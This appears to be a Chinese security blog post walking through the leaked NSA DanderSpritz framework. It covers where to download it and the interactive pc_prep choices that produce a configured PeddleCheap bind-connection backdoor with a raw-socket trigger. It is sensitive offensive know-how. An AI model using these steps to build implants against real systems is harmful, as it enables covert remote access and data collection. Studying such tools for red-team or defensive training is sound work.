首页 » NetworkSec » AWD » 正文

Danderspritz体验

前段时间需要一款支持正向连接的远控,试试danderspritz,还不错。
这是NSA泄露的工具中的一款远控,类似msf。
https://github.com/3gstudent/fuzzbunch(推荐!避免出现奇奇怪怪的错误)
or
https://github.com/fuzzbunch/fuzzbunch
java -jar start.jar
日志命名格式:C:\logs\xxx!!!!!否则报错
pc_prep
按需求生成后门
这里选25
Pick the payload type
25
Update advanced settings
NO
Listen AT ALL TIMES?
YES
Allow triggering via a raw socket?
YES
Allow fallback to promiscuous mode on that raw socket?
NO
Disable comms between PC and driver?
NO
Allow triggering via port knocking?
NO
Enter the PC ID [0]
Change LISTEN PORTS?
NO
– Pick a key
–   0) Exit
–   1) Create a new key
–   2) Default
Enter the desired option
2
– Configuration:

– <?xml version=’1.0′ encoding=’UTF-8′ ?>
– <PCConfig>
–   <Flags>
–     <PCHEAP_CONFIG_FLAG_24_HOUR/>
–     <PCHEAP_CONFIG_FLAG_RAW_SOCKET_TRIGGER/>
–   </Flags>
–   <Id>0x0</Id>
– </PCConfig>

Is this configuration valid
YES
Do you want to configure with FC?
NO
– Configured binary at:
–   C:\logs\0\z0.0.0.1/Payloads/PeddleCheap_2019_04_25_13h32m34s.934/PC_Level4_exe.configured
正向连接后门

成功连接后会加载模块收集目标信息

help/aliases获取帮助
 
参考资料
https://www.anquanke.com/post/id/85907
https://github.com/3gstudent/3gstudent.github.io/blob/master/_posts/2017-4-26-NSA%20DanderSpiritz%E6%B5%8B%E8%AF%95%E6%8C%87%E5%8D%97%E2%80%94%E2%80%94%E6%9C%A8%E9%A9%AC%E7%94%9F%E6%88%90%E4%B8%8E%E6%B5%8B%E8%AF%95.md
 

Comment

please input captcha *